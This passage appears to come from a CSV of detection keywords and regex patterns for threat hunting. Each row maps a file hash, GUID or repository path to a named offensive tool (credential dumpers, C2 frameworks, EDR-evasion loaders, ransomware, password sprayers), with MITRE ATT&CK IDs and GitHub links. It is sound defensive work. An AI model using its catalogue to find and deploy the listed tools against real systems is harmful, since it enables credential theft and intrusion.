"*0fd206b046e9a2b542a7a82d4aba38eba6339f813b60c4af451e48aa50bbc78c*",".{0,1000}0fd206b046e9a2b542a7a82d4aba38eba6339f813b60c4af451e48aa50bbc78c.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21812" "*0fd74299abc6f3a23b609351d6fc3e7c524b2e4652a4691ec11c9c6ec1ab48d2*",".{0,1000}0fd74299abc6f3a23b609351d6fc3e7c524b2e4652a4691ec11c9c6ec1ab48d2.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","0","#filehash","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","21814" "*0fde5da043382f46f04eaa04028fba0d127c20b87b88fbd7966805d5c93307ca*",".{0,1000}0fde5da043382f46f04eaa04028fba0d127c20b87b88fbd7966805d5c93307ca.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21815" "*0fdef22052732301186410ad11b9b5f63dfed89e9a35f431b5195cc4387ac918*",".{0,1000}0fdef22052732301186410ad11b9b5f63dfed89e9a35f431b5195cc4387ac918.{0,1000}","offensive_tool_keyword","ReverseSock5Proxy","A tiny Reverse Sock5 Proxy","T1090.002 - T1572 - T1071","TA0011 - TA0010","N/A","N/A","C2","https://github.com/Coldzer0/ReverseSock5Proxy","1","0","#filehash","N/A","10","10","317","42","2022-11-28T21:18:26Z","2022-11-25T15:12:59Z","21816" 
"*0FE0D049-F352-477D-BCCD-ACBF7D4F6F15*",".{0,1000}0FE0D049\-F352\-477D\-BCCD\-ACBF7D4F6F15.{0,1000}","offensive_tool_keyword","EvilSln","A New Exploitation Technique for Visual Studio Projects","T1564.001 - T1204.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/cjm00n/EvilSln","1","0","#GUIDproject","N/A","10","","N/A","","","","21818" "*0fea5161a6fd5c671200cd69364a12d916eaf65f26263dfaa9962cd997d61f84*",".{0,1000}0fea5161a6fd5c671200cd69364a12d916eaf65f26263dfaa9962cd997d61f84.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","21822" "*0ff4c1a9377e072a07cf09f94f8cf6ff423e531aab8a131347ecc5f023797eec*",".{0,1000}0ff4c1a9377e072a07cf09f94f8cf6ff423e531aab8a131347ecc5f023797eec.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","21823" "*0vercl0k/udmp-parser*",".{0,1000}0vercl0k\/udmp\-parser.{0,1000}","offensive_tool_keyword","udmp-parser","A Cross-Platform C++ parser library for Windows user minidumps.","T1005 - T1059.003 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/0vercl0k/udmp-parser","1","1","N/A","N/A","6","3","202","23","2024-11-20T15:58:21Z","2022-01-30T18:56:21Z","21826" "*0x00G/NiceRAT*",".{0,1000}0x00G\/NiceRAT.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - 
T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","1","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","21827" "*0x09AL/DNS-Persist*",".{0,1000}0x09AL\/DNS\-Persist.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","1","N/A","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z","21828" "*0x09AL/IIS-Raid*",".{0,1000}0x09AL\/IIS\-Raid.{0,1000}","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","1","N/A","N/A","10","10","541","124","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z","21829" "*0x09AL/RdpThief*",".{0,1000}0x09AL\/RdpThief.{0,1000}","offensive_tool_keyword","RdpThief","Extracting Clear Text Passwords from mstsc.exe using API Hooking.","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/0x09AL/RdpThief","1","1","N/A","N/A","10","10","1311","361","2024-07-20T06:58:02Z","2019-11-03T17:54:38Z","21830" "*0x4d, 0x44, 0x4d, 0x50, 0x93, 0xa7, 0x00, 0x00*",".{0,1000}0x4d,\s0x44,\s0x4d,\s0x50,\s0x93,\s0xa7,\s0x00,\s0x00.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","0","N/A","N/A","10","5","401","70","2024-07-08T15:58:37Z","2024-04-09T16:33:27Z","21831" "*0x4d, 0x44, 0x4d, 0x50, 0x93, 0xa7, 0x00, 0x00*",".{0,1000}0x4d,\s0x44,\s0x4d,\s0x50,\s0x93,\s0xa7,\s0x00,\s0x00.{0,1000}","offensive_tool_keyword","nanodump","nanodump string minidump","T1003 - 
T1055.011 - T1148","TA0006","N/A","Dispossessor","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","0","N/A","N/A","10","5","401","70","2024-07-08T15:58:37Z","2024-04-09T16:33:27Z","21832" "*0x4xel/Bat-Potato*",".{0,1000}0x4xel\/Bat\-Potato.{0,1000}","offensive_tool_keyword","Bat-Potato","Automating Juicy Potato Local Privilege Escalation CMD exploit for penetration testers","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/0x4xel/Bat-Potato","1","1","N/A","N/A","10","1","42","11","2022-12-13T20:19:51Z","2022-12-12T20:50:22Z","21833" "*0x727/MetasploitCoop_0x727*",".{0,1000}0x727\/MetasploitCoop_0x727.{0,1000}","offensive_tool_keyword","MetasploitCoop","Post-exploitation collaboration platform based on MSF","T1105 - T1098 - T1104 - T1136","TA0010 - TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x727/MetasploitCoop_0x727","1","1","N/A","N/A","10","10","217","38","2021-08-17T15:24:50Z","2021-08-17T10:37:44Z","21834" "*0x727/MetasploitCoop-Backend*",".{0,1000}0x727\/MetasploitCoop\-Backend.{0,1000}","offensive_tool_keyword","MetasploitCoop","Post-exploitation collaboration platform based on MSF","T1105 - T1098 - T1104 - T1136","TA0010 - TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x727/MetasploitCoop-Backend","1","1","N/A","N/A","10","10","37","8","2021-08-17T10:26:17Z","2021-08-17T07:52:12Z","21835" "*0x727/MetasploitCoop-Frontend*",".{0,1000}0x727\/MetasploitCoop\-Frontend.{0,1000}","offensive_tool_keyword","MetasploitCoop","Post-exploitation collaboration platform based on MSF","T1105 - T1098 - T1104 - T1136","TA0010 - TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x727/MetasploitCoop-Frontend","1","1","N/A","N/A","10","10","20","7","2024-04-03T14:49:19Z","2021-08-17T10:36:52Z","21836" "*0x727/SchTask_0x727*",".{0,1000}0x727\/SchTask_0x727.{0,1000}","offensive_tool_keyword","SchTask_0x727","create hidden scheduled tasks","T1053","TA0005 - 
TA0003","N/A","N/A","Persistence","https://github.com/0x727/SchTask_0x727","1","1","N/A","N/A","10","6","532","112","2021-09-01T01:34:51Z","2021-08-30T03:29:34Z","21837" "*0x727team@gmail.com*",".{0,1000}0x727team\@gmail\.com.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#email","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","21838" "*0x9999997B3deF7b69c09D7a9CA65E5242fb04a764*",".{0,1000}0x9999997B3deF7b69c09D7a9CA65E5242fb04a764.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","0","#filehash","N/A","10","10","672","215","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z","21839" "*0xB455/m365-fatigue*",".{0,1000}0xB455\/m365\-fatigue.{0,1000}","offensive_tool_keyword","m365-fatigue","automates the authentication process for Microsoft 365 by using the device code flow and Selenium for automated login. 
It keeps bombing the user with MFA requests and stores the access_token once the MFA was approved.","T1110.001 - T1078.001 - T1556.004","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/0xB455/m365-fatigue","1","1","N/A","N/A","10","1","77","7","2024-04-08T14:53:44Z","2023-11-30T13:33:03Z","21840" "*0xbadjuju/Tokenvator*",".{0,1000}0xbadjuju\/Tokenvator.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","21841" "*0xbadjuju/WheresMyImplant*",".{0,1000}0xbadjuju\/WheresMyImplant.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","21842" "*0xbdg/hidden-tear-remake*",".{0,1000}0xbdg\/hidden\-tear\-remake.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","1","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","21843" "*0xdarkvortex-MalwareDevelopment*",".{0,1000}0xdarkvortex\-MalwareDevelopment.{0,1000}","offensive_tool_keyword","prometheus","malware C2","T1071 - T1071.001 - T1105 - T1105.002 - T1106 - T1574.002","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/paranoidninja/0xdarkvortex-MalwareDevelopment","1","1","N/A","N/A","10","10","193","66","2020-07-21T06:14:44Z","2018-09-04T15:38:53Z","21844" 
"*0xdea/blindsight*",".{0,1000}0xdea\/blindsight.{0,1000}","offensive_tool_keyword","blindsight","Red teaming tool to dump LSASS memory, bypassing basic countermeasures","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/0xdea/blindsight","1","1","N/A","N/A","10","3","225","26","2024-12-31T15:28:15Z","2024-07-18T07:35:43Z","21845" "*0xdeadbeef*",".{0,1000}0xdeadbeef.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/timwr/CVE-2016-5195","1","1","N/A","N/A","N/A","10","972","393","2021-02-03T16:03:40Z","2016-10-21T11:19:21Z","21846" "*0xEr3bus/PoolPartyBof*",".{0,1000}0xEr3bus\/PoolPartyBof.{0,1000}","offensive_tool_keyword","cobaltstrike","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Defense Evasion","https://github.com/0xEr3bus/PoolPartyBof","1","0","N/A","N/A","9","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","21847" "*0xEr3bus/PoolPartyBof*",".{0,1000}0xEr3bus\/PoolPartyBof.{0,1000}","offensive_tool_keyword","PoolPartyBof","A beacon object file implementation of PoolParty Process Injection Technique","T1055.011 - T1055 - T1620","TA0005","N/A","Black Basta","Privilege 
Escalation","https://github.com/0xEr3bus/PoolPartyBof","1","1","N/A","N/A","10","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","21848" "*0xEr3bus/RdpStrike*",".{0,1000}0xEr3bus\/RdpStrike.{0,1000}","offensive_tool_keyword","RdpStrike","Positional Independent Code to extract clear text password from mstsc.exe using API Hooking via HWBP","T1081 - T1055.011 - T1012 - T1113 - T1040 - T1185","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xEr3bus/RdpStrike","1","1","N/A","N/A","10","3","238","27","2024-06-11T19:40:05Z","2024-06-11T19:31:50Z","21849" "*0xHossam/Killer*",".{0,1000}0xHossam\/Killer.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","1","N/A","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","21850" "*0xIslamTaha/Python-Rootkit*",".{0,1000}0xIslamTaha\/Python\-Rootkit.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","1","N/A","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","21851" "*0xless/slip*",".{0,1000}0xless\/slip.{0,1000}","offensive_tool_keyword","slip","Slip is a CLI tool to create malicious archive files containing path traversal payloads","T1560.001 - T1059","TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/0xless/slip","1","1","N/A","N/A","10","2","100","4","2025-04-11T18:36:31Z","2022-10-29T15:38:36Z","21852" "*0xsp-SRD/MDE_Enum*",".{0,1000}0xsp\-SRD\/MDE_Enum.{0,1000}","offensive_tool_keyword","MDE_Enum","extract and display detailed information about Windows 
Defender exclusions and Attack Surface Reduction (ASR) rules","T1070.006","TA0005 - TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/0xsp-SRD/MDE_Enum","1","1","N/A","N/A","8","2","198","18","2024-06-10T18:40:27Z","2024-06-06T15:54:44Z","21853" "*0xsp-SRD/mortar*",".{0,1000}0xsp\-SRD\/mortar.{0,1000}","offensive_tool_keyword","mortar","evasion technique to defeat and divert detection and prevention of security products (AV/EDR/XDR)","T1027 - T1562","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","1","N/A","N/A","8","10","1451","235","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z","21854" "*0xsp-SRD/mortar*",".{0,1000}0xsp\-SRD\/mortar.{0,1000}","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. 
Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","1","N/A","N/A","10","10","1451","235","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z","21855" "*0xthirteen/Carseat*",".{0,1000}0xthirteen\/Carseat.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","1","N/A","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","21856" "*0xthirteen/MoveKit*",".{0,1000}0xthirteen\/MoveKit.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","N/A","10","7","666","109","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z","21857" "*0xthirteen/PerfExec*",".{0,1000}0xthirteen\/PerfExec.{0,1000}","offensive_tool_keyword","PerfExec","PerfExec - an example performance dll that will run CMD.exe and a .NET assembly that will execute the DLL or gather performance data 
locally or remotely.","T1055.001 - T1059.001 - T1059.003 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/PerfExec","1","1","N/A","N/A","7","1","77","12","2023-08-02T20:53:24Z","2023-07-11T16:43:47Z","21858" "*0xthirteen/SharpMove*",".{0,1000}0xthirteen\/SharpMove.{0,1000}","offensive_tool_keyword","SharpMove",".NET Project for performing Authenticated Remote Execution","T1021 - T1106 - T1218","TA0002 - TA0008","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpMove","1","1","N/A","N/A","8","4","393","66","2023-02-08T23:48:54Z","2020-01-24T22:21:04Z","21859" "*0xthirteen/SharpRDP*",".{0,1000}0xthirteen\/SharpRDP.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","N/A","10","10","1041","554","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z","21860" "*0xthirteen/SharpStay*",".{0,1000}0xthirteen\/SharpStay.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","1","N/A","N/A","10","5","475","97","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z","21861" "*0xthirteen/StayKit*",".{0,1000}0xthirteen\/StayKit.{0,1000}","offensive_tool_keyword","cobaltstrike","StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. 
The aggressor script handles payload creation by reading the template files for a specific execution type.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Persistence","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","N/A","10","475","73","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z","21862" "*0xtosh/dnskire*",".{0,1000}0xtosh\/dnskire.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data 
Exfiltration","https://github.com/0xtosh/dnskire","1","1","N/A","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","21863" "*0xZDH/o365spray*",".{0,1000}0xZDH\/o365spray.{0,1000}","offensive_tool_keyword","o365spray","Username enumeration and password spraying tool aimed at Microsoft O365","T1110.003 - T1087.002","TA0007 - TA0006","N/A","N/A","Credential Access","https://github.com/0xZDH/o365spray","1","1","N/A","N/A","8","9","846","100","2024-11-06T00:49:23Z","2019-08-07T14:47:45Z","21864" "*0xZDH/Omnispray*",".{0,1000}0xZDH\/Omnispray.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","1","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","21865" "*0xZDH\Omnispray*",".{0,1000}0xZDH\\Omnispray.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","21866" "*1$a$$ Dl_lmp in *",".{0,1000}1\$a\$\$\sDl_lmp\sin\s.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","N/A","N/A","10","1","31","79","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z","21867" "*'1. 
Set the backdoor'*",".{0,1000}\'1\.\sSet\sthe\sbackdoor\'.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z","21868" "*1_FindDomain.sh*",".{0,1000}1_FindDomain\.sh.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","8","4","337","63","2024-10-01T11:22:01Z","2016-05-20T04:32:41Z","21869" "*1004ed17f2164c6dd249f7d640e8c8250e6c47d9e4d2c8748becb05591a8539b*",".{0,1000}1004ed17f2164c6dd249f7d640e8c8250e6c47d9e4d2c8748becb05591a8539b.{0,1000}","offensive_tool_keyword","TGT_Monitor","This script continuously monitors cache for new TGTs and displays them on the screen (admin privs required)","T1557.001 - T1040","TA0006 - TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/TGT_Monitor","1","0","#filehash","N/A","9","1","3","0","2023-11-08T18:48:55Z","2023-11-07T22:53:45Z","21870" "*1006275da2fa2271887b43047f3c81b8525866abe2e2f239e9f2cbde41de484e*",".{0,1000}1006275da2fa2271887b43047f3c81b8525866abe2e2f239e9f2cbde41de484e.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","21871" 
"*1008626761b65900ab77833ff6a2a3e2a4d8a7a4eab1e956d477d951f1edd28e*",".{0,1000}1008626761b65900ab77833ff6a2a3e2a4d8a7a4eab1e956d477d951f1edd28e.{0,1000}","offensive_tool_keyword","AutoBlue-MS17-010","automated exploit code for MS17-010","T1210 - T1040 - T1059.001","TA0001 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/3ndG4me/AutoBlue-MS17-010","1","0","#filehash","N/A","6","10","1240","317","2023-12-24T19:22:26Z","2017-11-25T09:03:38Z","21872" "*10119f906ce65acf48767f222524685945f3c25e8531bad35ad485c6e549ccc1*",".{0,1000}10119f906ce65acf48767f222524685945f3c25e8531bad35ad485c6e549ccc1.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","21873" "*1013cf05122064ab1bf61f1d89f17482f2c6d6990b6ae29b33b6fc6a4882d286*",".{0,1000}1013cf05122064ab1bf61f1d89f17482f2c6d6990b6ae29b33b6fc6a4882d286.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","21874" "*101ce1b9d0a8f8870b287bdc3308e443d3995cec57162678d83772df947a5ad4*",".{0,1000}101ce1b9d0a8f8870b287bdc3308e443d3995cec57162678d83772df947a5ad4.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - 
